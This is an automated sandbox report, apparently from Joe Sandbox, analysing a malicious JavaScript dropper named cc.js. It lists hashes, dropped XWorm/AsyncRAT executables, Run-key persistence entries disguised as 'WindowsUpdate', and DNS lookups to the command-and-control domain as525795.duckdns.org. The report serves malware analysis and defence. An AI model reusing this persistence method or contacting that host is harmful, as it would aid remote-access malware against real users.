Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	32
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	cc.js
Detection:	MAL
Classification:	mal100.troj.evad.winJS@49/5@3/0
EGA Information:	Successful, ratio: 23.1%
HCA Information:	Successful, ratio: 99% Number of executed functions: 324 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .js

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target GeUT.exe, PID 2404 because it is empty
Execution Graph export aborted for target GeUT.exe, PID 3172 because it is empty
Execution Graph export aborted for target GeUT.exe, PID 4948 because it is empty
Execution Graph export aborted for target GeUT.exe, PID 4976 because it is empty
Execution Graph export aborted for target GeUT.exe, PID 5004 because it is empty
Execution Graph export aborted for target GeUT.exe, PID 5156 because it is empty
Execution Graph export aborted for target GeUT.exe, PID 5916 because it is empty
Execution Graph export aborted for target GeUT.exe, PID 5968 because it is empty
Execution Graph export aborted for target GeUT.exe, PID 6552 because it is empty
Execution Graph export aborted for target GeUT.exe, PID 716 because it is empty
Execution Graph export aborted for target Service.exe, PID 1020 because it is empty
Execution Graph export aborted for target Service.exe, PID 1088 because it is empty
Execution Graph export aborted for target Service.exe, PID 1776 because it is empty
Execution Graph export aborted for target Service.exe, PID 2444 because it is empty
Execution Graph export aborted for target Service.exe, PID 4080 because it is empty
Execution Graph export aborted for target Service.exe, PID 4568 because it is empty
Execution Graph export aborted for target Service.exe, PID 4800 because it is empty
Execution Graph export aborted for target Service.exe, PID 5144 because it is empty
Execution Graph export aborted for target Service.exe, PID 6696 because it is empty
Execution Graph export aborted for target Service.exe, PID 6976 because it is empty
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
03:17:07	API Interceptor	3077799x Sleep call for process: GeUT.exe modified
09:17:06	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Windows C:\Users\user\AppData\Local\Temp\GeUT.exe
09:17:14	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user\AppData\Roaming\Service.exe
09:17:23	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Windows C:\Users\user\AppData\Local\Temp\GeUT.exe
09:17:31	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user\AppData\Roaming\Service.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Users\user\AppData\Roaming\Service.exe	ORDER-24930-067548.js	Get hash	malicious	StormKitty, XWorm	Browse
C:\Users\user\AppData\Local\Temp\GeUT.exe	ORDER-24930-067548.js	Get hash	malicious	StormKitty, XWorm	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GeUT.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\GeUT.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	520
Entropy (8bit):	5.355496254154943
Encrypted:	false
SSDEEP:	12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLUE4K5E4KlKDE4KhKiKhk
MD5:	3C255C75EA6EB42410894C0D08A4E324
SHA1:	34B3512313867B269C545241CD502B960213293A
SHA-256:	116B1D2FF17BE7FE8C4B6D935688F81C40716AFCD995C76BFC2D1AB2AFA774A7
SHA-512:	41406D84C3FC3D5EFAD22277382D9ADC444D00FDE95C1B7B6BC17E80452CA5DE084D28D892BC0C6890FE64DC733790E26D0F62FE3477175DCCCAC777FDE5E7EC
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Service.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\Service.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	520
Entropy (8bit):	5.355496254154943
Encrypted:	false
SSDEEP:	12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLUE4K5E4KlKDE4KhKiKhk
MD5:	3C255C75EA6EB42410894C0D08A4E324
SHA1:	34B3512313867B269C545241CD502B960213293A
SHA-256:	116B1D2FF17BE7FE8C4B6D935688F81C40716AFCD995C76BFC2D1AB2AFA774A7
SHA-512:	41406D84C3FC3D5EFAD22277382D9ADC444D00FDE95C1B7B6BC17E80452CA5DE084D28D892BC0C6890FE64DC733790E26D0F62FE3477175DCCCAC777FDE5E7EC
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Temp\GeUT.exe

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	59904
Entropy (8bit):	7.846014380238068
Encrypted:	false
SSDEEP:	1536:E8ZVRAKxLzsP5+tNJqqVOd39lS7OhRHgTy8:FRVxLzmEtNJRVOV9SOHH2y8
MD5:	7284765CA4D2F85C487796F437B01822
SHA1:	F1E51F7E021629857369888A16E201FB464B7A61
SHA-256:	680ED672969AC8F7D533B74B27B152F4608EF9BBA02F48935829455190B1E996
SHA-512:	17D1DF0DF786D7BFFF9EE7618EA0CC442804B03BD6F35F13F8BBE6DD7FFA581C663D724989038A163D9B3B116EEDEF198EE084A87B6E799A4C97984304469B32
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Joe Sandbox View:	Filename: ORDER-24930-067548.js, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G..f............................n.... ........@.. .......................@............@................................. ...K.......H.................... ....................................................... ............... ..H............text...t.... ...................... ..`.rsrc...H...........................@..@.reloc....... ......................@..B................P.......H........................#..\|............................................0..........r...p(....s.......o....t........0..........s....&..+.(....,...X...2...0..........rC..p(.....r...p(......r...pr...p(......r...pr...p(......(......r+..po......rM..po....................(....o........rU..p..................o....&(....(.............o....(.................................0..'.......~....rW..po......r...pr...po.....o......0..........(....s......(...."..o......0..".......~...

C:\Users\user\AppData\Local\Temp\Log.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\GeUT.exe
File Type:	Generic INItialization configuration [WIN]
Category:	dropped
Size (bytes):	64
Entropy (8bit):	3.6722687970803873
Encrypted:	false
SSDEEP:	3:rRSFYJKXzovNsr42VjFYJKXzovuEXn:EFYJKDoWr5FYJKDoG+n
MD5:	DE63D53293EBACE29F3F54832D739D40
SHA1:	1BC3FEF699C3C2BB7B9A9D63C7E60381263EDA7F
SHA-256:	A86BA2FC02725E4D97799A622EB68BF2FCC6167D439484624FA2666468BBFB1B
SHA-512:	10AB83C81F572DBAA99441D2BFD8EC5FF1C4BA84256ACDBD24FEB30A33498B689713EBF767500DAAAD6D188A3B9DC970CF858A6896F4381CEAC1F6A74E1603D0
Malicious:	false
Preview:	....### explorer ###..[WIN]r[WIN]....### explorer ###..r[WIN]r

C:\Users\user\AppData\Roaming\Service.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\GeUT.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	59904
Entropy (8bit):	7.846014380238068
Encrypted:	false
SSDEEP:	1536:E8ZVRAKxLzsP5+tNJqqVOd39lS7OhRHgTy8:FRVxLzmEtNJRVOV9SOHH2y8
MD5:	7284765CA4D2F85C487796F437B01822
SHA1:	F1E51F7E021629857369888A16E201FB464B7A61
SHA-256:	680ED672969AC8F7D533B74B27B152F4608EF9BBA02F48935829455190B1E996
SHA-512:	17D1DF0DF786D7BFFF9EE7618EA0CC442804B03BD6F35F13F8BBE6DD7FFA581C663D724989038A163D9B3B116EEDEF198EE084A87B6E799A4C97984304469B32
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Joe Sandbox View:	Filename: ORDER-24930-067548.js, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G..f............................n.... ........@.. .......................@............@................................. ...K.......H.................... ....................................................... ............... ..H............text...t.... ...................... ..`.rsrc...H...........................@..@.reloc....... ......................@..B................P.......H........................#..\|............................................0..........r...p(....s.......o....t........0..........s....&..+.(....,...X...2...0..........rC..p(.....r...p(......r...pr...p(......r...pr...p(......(......r+..po......rM..po....................(....o........rU..p..................o....&(....(.............o....(.................................0..'.......~....rW..po......r...pr...po.....o......0..........(....s......(...."..o......0..".......~...

Static File Info

General

File type:	Unicode text, UTF-16, little-endian text, with very long lines (27355), with CRLF line terminators
Entropy (8bit):	3.1698323653363847
TrID:	Text - UTF-16 (LE) encoded (2002/1) 66.67% MP3 audio (1001/1) 33.33%
File name:	cc.js
File size:	1'729'444 bytes
MD5:	c63888086e1646654a1e162fde69c0ff
SHA1:	8580dafbffe4d9b0d7e122127a455682ad2bd30e
SHA256:	262fb2e45f9b66956236f89f4cbeac22ee3d011832263a28ed7f632a22ae87d7
SHA512:	df2212775d03605673e6420ef74ec6c99fcdbf7e1dde3287c97c634553f66fd084e0f38549134ec9e0fb8cef4033be92013a430aa7955f0c691f7edff02fcb66
SSDEEP:	1536:Cz87aBaU8MENpImB8g0fCSjkXCR6cidzXXeF/LeKCO+RiboFN+LQ81fIgOz2ABPA:s87awfM2B85CSQSsXZXSeKGo7BvOiGI
TLSH:	B885E5FCF5451F2AE392B0599AC8585CB6B2D731F1C9CF141268624AC5DEC2B87C8ED8
File Content Preview:	.././.C.o.d.e.d. .B.y. .P.j.o.a.o.1.5.7.8.........v.a.r. .w.d.f.f.B.M.d.p.w.u.;.....w.d.f.f.B.M.d.p.w.u. .=. .[.".".,.....".W.S.!.......................!.c..!.!.!.!."" .!."r.!.......................!.i..!.!.!.!."" .!."p.!.......................!.t..!.!.!.

File Icon


Icon Hash:	68d69b8bb6aa9a86

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 1, 2024 09:17:12.894268990 CEST	61776	53	192.168.2.6	1.1.1.1
Oct 1, 2024 09:17:13.893368006 CEST	61776	53	192.168.2.6	1.1.1.1
Oct 1, 2024 09:17:14.909498930 CEST	61776	53	192.168.2.6	1.1.1.1
Oct 1, 2024 09:17:16.903489113 CEST	53	61776	1.1.1.1	192.168.2.6
Oct 1, 2024 09:17:16.903505087 CEST	53	61776	1.1.1.1	192.168.2.6
Oct 1, 2024 09:17:16.903513908 CEST	53	61776	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 1, 2024 09:17:12.894268990 CEST	192.168.2.6	1.1.1.1	0xfc63	Standard query (0)	as525795.duckdns.org	A (IP address)	IN (0x0001)	false
Oct 1, 2024 09:17:13.893368006 CEST	192.168.2.6	1.1.1.1	0xfc63	Standard query (0)	as525795.duckdns.org	A (IP address)	IN (0x0001)	false
Oct 1, 2024 09:17:14.909498930 CEST	192.168.2.6	1.1.1.1	0xfc63	Standard query (0)	as525795.duckdns.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 1, 2024 09:17:16.903489113 CEST	1.1.1.1	192.168.2.6	0xfc63	Server failure (2)	as525795.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Oct 1, 2024 09:17:16.903505087 CEST	1.1.1.1	192.168.2.6	0xfc63	Server failure (2)	as525795.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Oct 1, 2024 09:17:16.903513908 CEST	1.1.1.1	192.168.2.6	0xfc63	Server failure (2)	as525795.duckdns.org	none	none	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	03:17:01
Start date:	01/10/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\cc.js"
Imagebase:	0x7ff74f580000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:17:04
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Local\Temp\GeUT.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\GeUT.exe"
Imagebase:	0x410000
File size:	59'904 bytes
MD5 hash:	7284765CA4D2F85C487796F437B01822
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000002.2147849334.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000002.2147849334.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	03:17:04
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Local\Temp\GeUT.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\GeUT.exe"
Imagebase:	0x3b0000
File size:	59'904 bytes
MD5 hash:	7284765CA4D2F85C487796F437B01822
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	03:17:14
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Local\Temp\GeUT.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\GeUT.exe"
Imagebase:	0xf10000
File size:	59'904 bytes
MD5 hash:	7284765CA4D2F85C487796F437B01822
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000002.2255004351.0000000003359000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000002.2255004351.0000000003359000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	03:17:15
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Local\Temp\GeUT.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\GeUT.exe"
Imagebase:	0xb70000
File size:	59'904 bytes
MD5 hash:	7284765CA4D2F85C487796F437B01822
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000005.00000002.2282391567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000005.00000002.2282391567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	03:17:15
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Local\Temp\GeUT.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\GeUT.exe"
Imagebase:	0x2b0000
File size:	59'904 bytes
MD5 hash:	7284765CA4D2F85C487796F437B01822
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	03:17:15
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Local\Temp\GeUT.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\GeUT.exe"
Imagebase:	0x740000
File size:	59'904 bytes
MD5 hash:	7284765CA4D2F85C487796F437B01822
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	03:17:15
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Local\Temp\GeUT.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\GeUT.exe"
Imagebase:	0x120000
File size:	59'904 bytes
MD5 hash:	7284765CA4D2F85C487796F437B01822
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	03:17:15
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Local\Temp\GeUT.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\GeUT.exe"
Imagebase:	0x7b0000
File size:	59'904 bytes
MD5 hash:	7284765CA4D2F85C487796F437B01822
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	03:17:23
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Roaming\Service.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Service.exe"
Imagebase:	0x4c0000
File size:	59'904 bytes
MD5 hash:	7284765CA4D2F85C487796F437B01822
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000B.00000002.2338909006.0000000002891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000B.00000002.2338909006.0000000002891000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	03:17:23
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Roaming\Service.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Service.exe"
Imagebase:	0xb10000
File size:	59'904 bytes
MD5 hash:	7284765CA4D2F85C487796F437B01822
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	03:17:23
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Roaming\Service.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Service.exe"
Imagebase:	0x5b0000
File size:	59'904 bytes
MD5 hash:	7284765CA4D2F85C487796F437B01822
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	03:17:23
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Roaming\Service.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Service.exe"
Imagebase:	0x290000
File size:	59'904 bytes
MD5 hash:	7284765CA4D2F85C487796F437B01822
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	03:17:23
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Roaming\Service.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Service.exe"
Imagebase:	0xc20000
File size:	59'904 bytes
MD5 hash:	7284765CA4D2F85C487796F437B01822
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	03:17:23
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Roaming\Service.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Service.exe"
Imagebase:	0xcb0000
File size:	59'904 bytes
MD5 hash:	7284765CA4D2F85C487796F437B01822
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	03:17:31
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Local\Temp\GeUT.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\GeUT.exe"
Imagebase:	0x490000
File size:	59'904 bytes
MD5 hash:	7284765CA4D2F85C487796F437B01822
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	03:17:31
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Local\Temp\GeUT.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\GeUT.exe"
Imagebase:	0xee0000
File size:	59'904 bytes
MD5 hash:	7284765CA4D2F85C487796F437B01822
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	03:17:31
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Local\Temp\GeUT.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\GeUT.exe"
Imagebase:	0xee0000
File size:	59'904 bytes
MD5 hash:	7284765CA4D2F85C487796F437B01822
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	03:17:31
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Local\Temp\GeUT.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\GeUT.exe"
Imagebase:	0xad0000
File size:	59'904 bytes
MD5 hash:	7284765CA4D2F85C487796F437B01822
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	03:17:31
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Local\Temp\GeUT.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\GeUT.exe"
Imagebase:	0xd80000
File size:	59'904 bytes
MD5 hash:	7284765CA4D2F85C487796F437B01822
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	03:17:31
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Local\Temp\GeUT.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\GeUT.exe"
Imagebase:	0xa50000
File size:	59'904 bytes
MD5 hash:	7284765CA4D2F85C487796F437B01822
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	03:17:39
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Roaming\Service.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Service.exe"
Imagebase:	0x3e0000
File size:	59'904 bytes
MD5 hash:	7284765CA4D2F85C487796F437B01822
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	03:17:39
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Roaming\Service.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Service.exe"
Imagebase:	0x390000
File size:	59'904 bytes
MD5 hash:	7284765CA4D2F85C487796F437B01822
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	03:17:39
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Roaming\Service.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Service.exe"
Imagebase:	0xd90000
File size:	59'904 bytes
MD5 hash:	7284765CA4D2F85C487796F437B01822
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	03:17:39
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Roaming\Service.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Service.exe"
Imagebase:	0x490000
File size:	59'904 bytes
MD5 hash:	7284765CA4D2F85C487796F437B01822
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	03:17:39
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Roaming\Service.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Service.exe"
Imagebase:	0x880000
File size:	59'904 bytes
MD5 hash:	7284765CA4D2F85C487796F437B01822
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	03:17:39
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Roaming\Service.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Service.exe"
Imagebase:	0xf20000
File size:	59'904 bytes
MD5 hash:	7284765CA4D2F85C487796F437B01822
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	16%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	18
Total number of Limit Nodes:	2

Executed Functions

Function 00C90D30 Relevance: 1.8, Strings: 1, Instructions: 586
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(, xrefs: 00C914C2

Memory Dump Source

Source File: 00000002.00000002.2147328728.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_c90000_GeUT.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 4eff746a542a405d55b2c9b63ca77c7e1170d494ffd313ef28b37af664bb8f2e
Instruction ID: a748b5c5a575da293fc462d08f8eeac7ebc04d29284dc8533b4d06241533101e
Opcode Fuzzy Hash: 4eff746a542a405d55b2c9b63ca77c7e1170d494ffd313ef28b37af664bb8f2e
Instruction Fuzzy Hash: 5F52D074E012298FDB68DF65C945BEDB7B2BF89300F2481EAD509AB295DB345E84CF40

Function 00C91B9C Relevance: 1.7, APIs: 1, Instructions: 226
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00C91D79

Memory Dump Source

Source File: 00000002.00000002.2147328728.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_c90000_GeUT.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: e17935d66087fb1200cc4f97d79e2bad85d7e884cf3baa9fb3022ab93c5eb66d
Instruction ID: 5431277e6af787fa67819e8e4ae10deac06710eb97a073772a062011ebc37c34
Opcode Fuzzy Hash: e17935d66087fb1200cc4f97d79e2bad85d7e884cf3baa9fb3022ab93c5eb66d
Instruction Fuzzy Hash: 2481D274C00229DFDF21CFA9C944BEDBBB5BB49300F1491AAE508B7260DB709A89CF54

Function 00C91BA8 Relevance: 1.7, APIs: 1, Instructions: 220
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00C91D79

Memory Dump Source

Source File: 00000002.00000002.2147328728.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_c90000_GeUT.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 3bc47c6dbb889d2e2871b43f328d1c0b1a6cad33a00dace12117b77a024f4121
